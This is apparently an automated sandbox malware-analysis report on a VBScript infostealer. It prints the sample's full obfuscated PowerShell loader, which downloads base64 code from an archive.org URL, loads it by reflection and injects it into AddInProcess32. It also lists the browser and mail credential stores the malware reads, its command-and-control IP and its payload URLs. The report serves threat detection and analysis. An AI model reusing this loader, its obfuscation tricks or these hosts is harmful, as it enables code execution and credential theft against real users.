ltrccsw3n0umloz11bq2hhul0zoskgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".((gv '*mdr*').name[3,11,2]-join'') (('dk'+'7u'+'rl '+'= ysdhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'detah'+'n'+'otev.t'+'xt'+'ysd'+';dk7'+'b'+'ase'+'64co'+'nten'+'t'+' = '+'(ne'+'w-o'+'bje'+'ct '+'s'+'ys'+'te'+'m.ne'+'t.webc'+'lie'+'nt).downlo'+'a'+'ds'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryco'+'n'+'ten'+'t = '+'[syste'+'m.convert'+']:'+':'+'fr'+'ombase64s'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'r'+'eflect'+'ion.as'+'s'+'embly]:'+':l'+'oa'+'d(dk7bin'+'ary'+'co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.ge'+'ttype('+'y'+'sdru'+'np'+'e'+'.hom'+'ey'+'sd'+');dk7method ='+' dk7'+'type.'+'g'+'e'+'tmeth'+'od(ysdvaiysd)'+';dk7met'+'h'+'o'+'d.i'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'ysd'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thysd ,'+' ysd'+'desat'+'i'+'v'+'ad'+'oys'+'d ,'+' '+'ysd'+'d'+'esa'+'ti'+'vado'+'y'+'sd'+' , '+'ysddesativadoy'+'s'+'d'+',y'+'sdadd'+'inp'+'ro'+'cess3'+'2ysd,ysdysd'+'))').replace('dk7',[string][char]36).replace('ysd',[string][char]39) )"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00412E91 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,5_2_00412E91
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00410A8C AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,5_2_00410A8C
              Source: AddInProcess32.exe, 00000005.00000002.2627316202.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2627316202.00000000014F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: AddInProcess32.exe, 00000005.00000002.2627316202.00000000014B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerm3k
              Source: AddInProcess32.exe, 00000005.00000002.2627316202.00000000014B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerU3c
              Source: AddInProcess32.exe, 00000005.00000002.2627316202.00000000014B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager]3{
              Source: AddInProcess32.exe, 00000005.00000002.2627316202.00000000014B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managere3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00410E5E cpuid 5_2_00410E5E
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00408D0F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,5_2_00408D0F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCCCCC9 memset,GetVersionExA,GetLastError,___swprintf_l,___swprintf_l,5_2_6CCCCCC9
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 4.2.powershell.exe.1b2b2de3860.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 4.2.powershell.exe.1b2b3937090.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1b2bb240000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1b2bb240000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1b2b3937090.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.1443666553.000001B2BB240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1415526929.000001B2B3123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \Google\Chrome\User Data\Default\Login Data5_2_0040B917
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \Chromium\User Data\Default\Login Data5_2_0040B917
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: POP3 Password5_2_004099FF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: SMTP Password5_2_004099FF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: IMAP Password5_2_004099FF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\pkcs11.txtJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default\logins.jsonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1352, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6992, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 4.2.powershell.exe.1b2b2de3860.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 4.2.powershell.exe.1b2b3937090.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1b2bb240000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1b2bb240000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1b2b3937090.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.1443666553.000001B2BB240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1415526929.000001B2B3123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC78DF1 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6CC78DF1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC78D29 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6CC78D29
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC9CE08 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_6CC9CE08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC9AF89 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,5_2_6CC9AF89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC78F4E sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,5_2_6CC78F4E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC7EF13 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,sqlite3_bind_int64,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,sqlite3_bind_int64,sqlite3_step,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_bind_int,sqlite3_column_int,sqlite3_bind_int,sqlite3_column_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,5_2_6CC7EF13
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC78954 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,5_2_6CC78954
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC804F3 sqlite3_bind_int64,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,5_2_6CC804F3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCC6464 PR_Bind,5_2_6CCC6464
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC80588 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,5_2_6CC80588
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC7C7C5 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,5_2_6CC7C7C5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCC67ED PR_Listen,5_2_6CCC67ED
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC7C0AA sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6CC7C0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC821F1 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_free,sqlite3_step,sqlite3_reset,5_2_6CC821F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC7C103 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_free,sqlite3_free,memcpy,memcpy,memcpy,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_reset,5_2_6CC7C103
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC822C4 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6CC822C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC662EB sqlite3_value_text,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,5_2_6CC662EB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC8231A sqlite3_bind_null,sqlite3_step,sqlite3_reset,5_2_6CC8231A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC7BDCA sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,5_2_6CC7BDCA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC9BDE9 sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int,sqlite3_reset,__allrem,__allrem,memset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_6CC9BDE9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC81D03 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_6CC81D03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC7BEC2 memset,sqlite3_malloc,memset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_reset,5_2_6CC7BEC2
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting
              Valid Accounts2
              Native API
              221
              Scripting
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              3
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              22
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              Endpoint Denial of Service
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              3
              Obfuscated Files or Information
              21
              Input Capture
              1
              System Service Discovery
              Remote Desktop Protocol1
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts11
              Command and Scripting Interpreter
              1
              Create Account
              1
              Windows Service
              1
              Software Packing
              1
              Credentials In Files
              3
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Service Execution
              1
              Windows Service
              322
              Process Injection
              1
              DLL Side-Loading
              NTDS26
              System Information Discovery
              Distributed Component Object Model21
              Input Capture
              2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts3
              PowerShell
              Network Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets111
              Security Software Discovery
              SSHKeylogging13
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync3
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job322
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Hidden Files and Directories
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Hidden Users
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523823 Sample: 89SkYNNpdi.vbs Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 34 pub-26ee9be236b54d0cb1b570a203543b93.r2.dev 2->34 36 ia600100.us.archive.org 2->36 52 Multi AV Scanner detection for domain / URL 2->52 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 13 other signatures 2->58 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 68 VBScript performs obfuscated calls to suspicious functions 9->68 70 Suspicious powershell command line found 9->70 72 Wscript starts Powershell (via cmd or directly) 9->72 74 3 other signatures 9->74 12 powershell.exe 7 9->12         started        process6 signatures7 76 Suspicious powershell command line found 12->76 78 Obfuscated command line found 12->78 80 Found suspicious powershell code related to unpacking or dynamic code loading 12->80 15 powershell.exe 14 15 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 40 pub-26ee9be236b54d0cb1b570a203543b93.r2.dev 162.159.140.237, 443, 49703 CLOUDFLARENETUS United States 15->40 42 ia600100.us.archive.org 207.241.227.240, 443, 49702 INTERNET-ARCHIVEUS United States 15->42 44 Contains functionality to hide user accounts 15->44 46 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->46 48 Writes to foreign memory regions 15->48 50 Injects a PE file into a foreign processes 15->50 21 AddInProcess32.exe 3 12 15->21         started        signatures10 process11 dnsIp12 38 109.248.151.156, 2048, 49704 DATACLUBLV Russian Federation 21->38 26 C:\Users\user\AppData\...\vcruntime140.dll, PE32 21->26 dropped 28 C:\Users\user\AppData\Local\...\softokn3.dll, PE32 21->28 dropped 30 C:\Users\user\AppData\Local\Temp\nss3.dll, PE32 21->30 dropped 32 3 other files (none is malicious) 21->32 dropped 60 Contains functionality to hide user accounts 21->60 62 Tries to steal Mail credentials (via file / registry access) 21->62 64 Contains functionality to inject threads in other processes 21->64 66 5 other signatures 21->66 file13 signatures14

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              89SkYNNpdi.vbs5%ReversingLabsWin32.Trojan.Generic
              89SkYNNpdi.vbs11%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\freebl3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\freebl3.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\mozglue.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\mozglue.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\msvcp140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\msvcp140.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\nss3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nss3.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\softokn3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\softokn3.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\vcruntime140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\vcruntime140.dll0%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              ia600100.us.archive.org0%VirustotalBrowse
              pub-26ee9be236b54d0cb1b570a203543b93.r2.dev16%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              http://ocsp.thawte.com00%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore60%URL Reputationsafe
              http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://oneget.orgX0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://oneget.org0%URL Reputationsafe
              https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev/onye.txt17%VirustotalBrowse
              https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev4%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              https://ia600100.us0%VirustotalBrowse
              http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse
              https://github.com/Pester/Pester1%VirustotalBrowse
              https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtYSD;dk7base64Content1%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
              https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt10%VirustotalBrowse
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%VirustotalBrowse
              http://crl.rootca1.amazontrust.com/rootca1.crl00%VirustotalBrowse
              http://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev16%VirustotalBrowse
              https://github.com/syohex/java-simple-mine-sweeper0%VirustotalBrowse
              https://github.com/syohex/java-simple-mine-sweeperC:0%VirustotalBrowse
              https://ia600100.us.archive.org1%VirustotalBrowse
              http://ia600100.us.archive.org0%VirustotalBrowse
              109.248.151.1562%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
